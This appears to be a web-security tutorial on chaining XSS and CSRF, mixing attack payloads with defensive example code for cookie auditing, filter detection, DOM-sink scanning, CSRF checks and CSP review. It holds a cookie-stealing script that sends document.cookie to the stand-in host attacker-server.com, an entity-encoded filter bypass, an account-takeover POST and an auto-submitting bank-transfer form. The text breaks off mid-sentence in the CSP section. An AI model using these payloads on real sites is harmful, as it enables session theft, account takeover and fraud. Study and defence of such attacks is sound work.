Advanced XSS and CSRF: Exploiting the Web’s Most Deceptive Threats



Introduction:

Cross-Site Scripting (XSS) and Cross-Site Request Forgery (CSRF) remain two of the most pervasive and dangerous vulnerabilities in modern web applications. While often discussed separately, their combined potential for sophisticated attacks, as demonstrated in platforms like Hack The Box, can lead to complete account takeover and system compromise. This article delves into the advanced techniques that move beyond simple alert boxes to weaponize these flaws for real-world impact.

Learning Objectives:

  • Understand the mechanics of advanced XSS attacks, including stored, reflected, and DOM-based variants.
  • Learn how to chain XSS with CSRF to perform privileged actions on behalf of authenticated users.
  • Master the commands and tools necessary to identify, exploit, and mitigate these critical vulnerabilities.

You Should Know:

1. Crafting the Stored XSS Payload for Initial Foothold

A stored XSS vulnerability is the key to persistence, as the malicious script is saved on the target server and executed for every user who views the infected page. This is often the first step in a chain attack.

Verified Code Snippet:

```html
<script>
fetch('https://attacker-server.com/steal?cookie=' + document.cookie);
</script>
```

Step-by-step guide:

This payload is designed to be injected into a vulnerable web application field, like a comment or profile description. When a victim user (including an administrator) loads the page containing this payload, the script executes automatically. It uses the `fetch()` API to make an HTTP request to an attacker-controlled server, appending the user’s session cookies as a URL parameter. The attacker monitoring their server logs can then capture these cookies and hijack the user’s authenticated session.
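The payload above only reaches cookies that `document.cookie` can read, which are the ones set without the HttpOnly attribute. As an added example (not code from the original post), the following audits constructed Set-Cookie headers for the attributes that bound this theft; the session-name heuristic is an assumption of the example.

```javascript
// Added example (not from the original post): audit Set-Cookie headers for the
// attributes that limit what the cookie-theft payload above can reach.
// document.cookie only exposes cookies that lack HttpOnly, so a session cookie
// without it is exactly what that payload exfiltrates.

const SESSION_NAME_HINT = /sess|sid|token|auth/i; // assumed naming heuristic

// Parse one Set-Cookie header value into { name, value, attrs }.
function parseSetCookie(header) {
  const [pair, ...rest] = header.split(';').map((s) => s.trim());
  const eq = pair.indexOf('=');
  const name = eq === -1 ? pair : pair.slice(0, eq);
  const value = eq === -1 ? '' : pair.slice(eq + 1);
  const attrs = {};
  for (const part of rest) {
    const i = part.indexOf('=');
    const key = (i === -1 ? part : part.slice(0, i)).toLowerCase();
    attrs[key] = i === -1 ? true : part.slice(i + 1);
  }
  return { name, value, attrs };
}

// Return the findings for one cookie; an empty array means it is hardened.
function auditCookie(header) {
  const { name, attrs } = parseSetCookie(header);
  const findings = [];
  if (!('httponly' in attrs)) {
    findings.push(SESSION_NAME_HINT.test(name)
      ? 'session cookie readable via document.cookie (missing HttpOnly)'
      : 'missing HttpOnly');
  }
  if (!('secure' in attrs)) findings.push('missing Secure');
  const sameSite = String(attrs.samesite || '').toLowerCase();
  if (sameSite !== 'lax' && sameSite !== 'strict') {
    findings.push('SameSite not Lax/Strict (cross-site POSTs will carry it)');
  }
  return findings;
}

// Constructed sample headers, not captured from any real site.
const SAMPLE_HEADERS = [
  'PHPSESSID=abc123; Path=/',
  'sessionid=xyz789; Path=/; HttpOnly; Secure; SameSite=Lax',
];

function auditAll(headers) {
  return headers.map((h) => ({ cookie: parseSetCookie(h).name, findings: auditCookie(h) }));
}

for (const r of auditAll(SAMPLE_HEADERS)) console.log(r.cookie, r.findings);
```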

2. Bypassing Basic XSS Filters with Encoding

Web Application Firewalls (WAFs) and basic input filters often block common tags like <script>. Advanced exploitation requires techniques to obfuscate the payload.

Verified Code Snippet:

```html
<IMG SRC=x onerror="&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41;">
```

Step-by-step guide:

This payload uses an image tag with a deliberately invalid source (x). The `onerror` event handler, which fires when the image fails to load, contains `javascript:alert(1)` written as decimal HTML character references. The HTML parser decodes those references in the attribute value before the string ever reaches the JavaScript engine, so a filter that matches plaintext script blocks or the literal string `alert` never sees it. Test this by injecting it into a search field that reflects input back to the page.
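The bypass works because the matching happens on the raw text while the browser executes the decoded text. As an added example (not code from the original post), this detector decodes numeric character references the way the HTML parser does before matching, and reports which indicators fire only after decoding; it is a triage aid, not a sanitizer, and the rendering-side fix remains output encoding plus CSP.

```javascript
// Added example (not from the original post): a detector that decodes numeric
// character references the way the HTML parser does before matching, because
// the encoded payload above contains none of the strings a raw-text filter
// looks for. Detection aid only; the rendering-side fix is output encoding + CSP.

// Decode decimal (&#NNN;) and hexadecimal (&#xHH;) character references.
function decodeNumericEntities(s) {
  return s.replace(/&#(x[0-9a-f]+|[0-9]+);?/gi, (m, code) => {
    const cp = code[0].toLowerCase() === 'x'
      ? parseInt(code.slice(1), 16)
      : parseInt(code, 10);
    return Number.isFinite(cp) && cp <= 0x10ffff ? String.fromCodePoint(cp) : m;
  });
}

// Indicators matched on the browser-equivalent (decoded) text.
const INDICATORS = [
  { name: 'script tag', re: /<script\b/i },
  { name: 'javascript: URL', re: /javascript\s*:/i },
  { name: 'event handler attribute', re: /\bon[a-z]+\s*=/i },
];

// Report which indicators fire on the raw input and which only after decoding.
function findIndicators(input) {
  const decoded = decodeNumericEntities(input);
  const names = (text) => INDICATORS.filter(({ re }) => re.test(text)).map((i) => i.name);
  return { raw: names(input), afterDecode: names(decoded), decoded };
}

// Constructed sample: the decimal-entity form of "javascript:alert(1)" from the post.
const ENCODED_HANDLER =
  '&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;' +
  '&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41;';

const report = findIndicators(ENCODED_HANDLER);
console.log(report.decoded);      // javascript:alert(1)
console.log(report.raw);          // []
console.log(report.afterDecode);  // [ 'javascript: URL' ]
```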

3. Weaponizing XSS to Perform CSRF Attacks

Once XSS is achieved, it can be used to forge requests from the victim’s browser, bypassing CSRF protections like anti-CSRF tokens because the script can read the token from the page.

Verified Code Snippet:

```html
<script>
fetch('/admin/change-email', {
  method: 'POST',
  headers: { 'Content-Type': 'application/json' },
  body: JSON.stringify({ email: 'ATTACKER_EMAIL' }) // placeholder for the attacker-chosen address
});
</script>
```

Step-by-step guide:

This script, delivered via XSS, forces the victim’s browser to silently send a POST request to an application’s privileged endpoint (e.g., an email change function). Since the request is sent with the victim’s active session cookies, the application processes it as a legitimate user action. This chaining is devastating, as it turns a simple XSS into a full account takeover.

4. Exploiting DOM-Based XSS with the Fragment Identifier

DOM-based XSS occurs when client-side JavaScript unsafely handles data from the URL's fragment (the part after the `#`).

Verified Code Snippet:

```javascript
// Vulnerable Code on the target page
var target = document.getElementById('message');
target.innerHTML = decodeURIComponent(window.location.hash.substring(1));
```

Exploitation URL:

`https://vulnerable-site.com/error`

Step-by-step guide:

The vulnerable script takes the content after the `#` in the URL and writes it directly into the page's HTML using `innerHTML`. An attacker crafts a URL whose fragment contains a malicious HTML payload. When the victim is tricked into visiting this URL, the payload renders and executes. This attack is particularly stealthy because the fragment is never sent to the server, so server-side logs and filters never see the payload.
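Because the server never sees the payload, this class of bug has to be found in the client-side code itself. As an added example (not code from the original post), here is a toy source-to-sink scan run over the vulnerable snippet above and over a rewrite that assigns the fragment to `textContent` instead of `innerHTML`; same-statement flow and the source/sink lists are assumptions of the example.

```javascript
// Added example (not from the original post): a toy source-to-sink scan for the
// DOM XSS pattern above. It flags a statement in which an attacker-controlled
// DOM source (location.hash, location.search, document.URL, document.referrer)
// reaches an HTML-executing sink (innerHTML, outerHTML, document.write,
// insertAdjacentHTML, eval). Same-statement flow is an assumption of this toy;
// a real taint tracker follows the value through variables.

const SOURCES = ['location.hash', 'location.search', 'document.URL', 'document.referrer'];
const SINKS = [
  { name: 'innerHTML', re: /\.innerHTML\s*=/ },
  { name: 'outerHTML', re: /\.outerHTML\s*=/ },
  { name: 'document.write', re: /document\.write(ln)?\s*\(/ },
  { name: 'insertAdjacentHTML', re: /\.insertAdjacentHTML\s*\(/ },
  { name: 'eval', re: /\beval\s*\(/ },
];

// Strip // comments, split on ';', and scan each statement.
function scanForDomXss(code) {
  const findings = [];
  code.replace(/\/\/.*$/gm, '').split(';').forEach((stmt, idx) => {
    const text = stmt.trim();
    if (!text) return;
    const source = SOURCES.find((s) => text.includes(s));
    const sink = SINKS.find(({ re }) => re.test(text));
    if (source && sink) findings.push({ statement: idx + 1, source, sink: sink.name });
  });
  return findings;
}

// Constructed samples: the post's vulnerable code, then a rewrite that assigns
// the fragment to textContent so it is rendered as text rather than parsed as markup.
const VULNERABLE = `
// Vulnerable Code on the target page
var target = document.getElementById('message');
target.innerHTML = decodeURIComponent(window.location.hash.substring(1));
`;
const FIXED = `
var target = document.getElementById('message');
target.textContent = decodeURIComponent(window.location.hash.substring(1));
`;

console.log(scanForDomXss(VULNERABLE)); // [ { statement: 2, source: 'location.hash', sink: 'innerHTML' } ]
console.log(scanForDomXss(FIXED));      // []
```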

5. Manual CSRF Proof-of-Concept with HTML

Understanding the underlying HTML form that a CSRF attack forges is crucial for crafting exploits when automated tools fail.

Verified Code Snippet:

```html
<html>
<body>

<form action="https://bank.com/transfer" method="POST">
<input type="hidden" name="amount" value="1000">
<input type="hidden" name="account" value="ATTACKER_ACCOUNT">
<input type="submit" value="View Cat Pictures!">
</form>

<script>document.forms[0].submit();</script>
</body>
</html>
```

Step-by-step guide:

This HTML file creates a hidden form that submits a malicious request to a banking transfer endpoint. The `action` attribute targets the vulnerable endpoint. The hidden `input` fields pre-fill the transaction details. The script at the bottom automatically submits the form. An attacker would host this file and lure a logged-in bank user to visit it. The form will submit seamlessly, initiating the transfer.
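On the receiving side, the forged form above arrives with the victim's cookies but from a foreign origin and without a per-session token. As an added example (not code from the original post), the following server-side check, run against constructed requests, rejects that form while accepting a legitimate same-origin post; it also shows that the same-origin request forged by injected script in section 3 passes both tests, which is why a CSRF defence does not substitute for fixing the XSS. The token location and header names are assumptions of the example.

```javascript
// Added example (not from the original post): a server-side CSRF check run
// against constructed requests. A state-changing request passes only if its
// Origin (or Referer) matches the site and it carries the synchronizer token
// bound to the session. The forged bank.com form from the section above fails;
// a same-origin request forged by injected script (section 3) passes, which is
// why a CSRF defence does not substitute for fixing the XSS itself.

const SITE_ORIGIN = 'https://bank.com'; // origin from the post's example

function originOf(req) {
  const hdr = req.headers.origin || req.headers.referer;
  if (!hdr) return null;
  try { return new URL(hdr).origin; } catch (e) { return null; }
}

// Compare tokens without leaking where they differ through timing.
function constantTimeEqual(a, b) {
  if (typeof a !== 'string' || typeof b !== 'string' || a.length !== b.length) return false;
  let diff = 0;
  for (let i = 0; i < a.length; i++) diff |= a.charCodeAt(i) ^ b.charCodeAt(i);
  return diff === 0;
}

// Returns { allowed, reason }; token may arrive as a form/JSON field or a header.
function checkCsrf(req, session) {
  if (originOf(req) !== SITE_ORIGIN) return { allowed: false, reason: 'cross-origin or missing Origin' };
  const presented = req.body.csrf_token || req.headers['x-csrf-token'];
  if (!constantTimeEqual(presented, session.csrfToken)) return { allowed: false, reason: 'bad token' };
  return { allowed: true, reason: 'ok' };
}

// Constructed session and requests.
const session = { csrfToken: 'tok_9f2c1e' };
const forgedFormPost = { // the attacker-hosted form from section 5, auto-submitted
  headers: { origin: 'https://attacker.example' },
  body: { amount: '1000', account: 'ATTACKER_ACCOUNT' },
};
const legitimatePost = {
  headers: { origin: SITE_ORIGIN },
  body: { amount: '50', account: 'SAVINGS', csrf_token: 'tok_9f2c1e' },
};
const xssForgedPost = { // same-origin fetch() issued by injected script (section 3)
  headers: { origin: SITE_ORIGIN, 'x-csrf-token': 'tok_9f2c1e' },
  body: { amount: '1000', account: 'ATTACKER_ACCOUNT' },
};

console.log(checkCsrf(forgedFormPost, session)); // allowed: false
console.log(checkCsrf(legitimatePost, session)); // allowed: true
console.log(checkCsrf(xssForgedPost, session));  // allowed: true
```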

6. Mitigation: Implementing Content Security Policy (CSP)

The most effective defense against XSS is a strong Content Security Policy, which whitelists allowed sources of scripts and other resources.

Verified HTTP Header:

`Content-Security-Policy: default-src 'self'; script-src 'self' https://trusted.cdn.com; object-src 'none';`

Step-by-step guide:

This header instructs the browser to only execute scripts that originate from the application’s own domain ('self') or a specific, trusted CDN. It also blocks all plugins (object-src 'none'). Even if an attacker successfully injects a `
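A policy is only as strong as its weakest source expression, so it is worth checking the header mechanically rather than by eye. As an added example (not code from the original post), the following parses a Content-Security-Policy header and flags the settings that would still let injected script run; the header above passes, and a constructed weak header shows the common mistakes. The rule set is an assumption of the example, not a complete CSP evaluator.

```javascript
// Added example (not from the original post): parse a Content-Security-Policy
// header and flag the settings that would still let injected script run. The
// post's header passes; a constructed weak header shows the usual mistakes.

function parseCsp(header) {
  const policy = {};
  for (const directive of header.split(';')) {
    const [name, ...values] = directive.trim().split(/\s+/).filter(Boolean);
    if (name) policy[name.toLowerCase()] = values.map((v) => v.replace(/^'|'$/g, '').toLowerCase());
  }
  return policy;
}

// Return a list of weaknesses; an empty list means no obvious script-execution hole.
function auditCsp(header) {
  const p = parseCsp(header);
  const problems = [];
  const scriptSrc = p['script-src'] || p['default-src'];
  if (!scriptSrc) return ['no script-src or default-src: inline and remote script unrestricted'];
  if (!p['script-src']) problems.push('script-src falls back to default-src (make it explicit)');
  // CSP3 browsers ignore 'unsafe-inline' once a nonce or hash source is present.
  const hasNonceOrHash = scriptSrc.some((v) => /^(nonce-|sha(256|384|512)-)/.test(v));
  if (scriptSrc.includes('unsafe-inline') && !hasNonceOrHash) {
    problems.push("'unsafe-inline' in script-src: injected <script> and onerror= handlers run");
  }
  if (scriptSrc.includes('unsafe-eval')) problems.push("'unsafe-eval' in script-src");
  if (scriptSrc.some((v) => v === '*' || v === 'https:' || v === 'http:')) {
    problems.push('script-src allows any host via a wildcard or bare scheme');
  }
  if (scriptSrc.includes('data:')) problems.push('script-src allows data: URLs');
  const objectSrc = p['object-src'] || p['default-src'] || [];
  if (!objectSrc.includes('none')) problems.push("object-src is not 'none': plugin content can run script");
  return problems;
}

// Constructed headers: the first is the policy recommended above.
const GOOD_CSP = "default-src 'self'; script-src 'self' https://trusted.cdn.com; object-src 'none';";
const WEAK_CSP = "default-src *; script-src 'self' 'unsafe-inline' https:;";

console.log(auditCsp(GOOD_CSP)); // []
console.log(auditCsp(WEAK_CSP)); // three findings
```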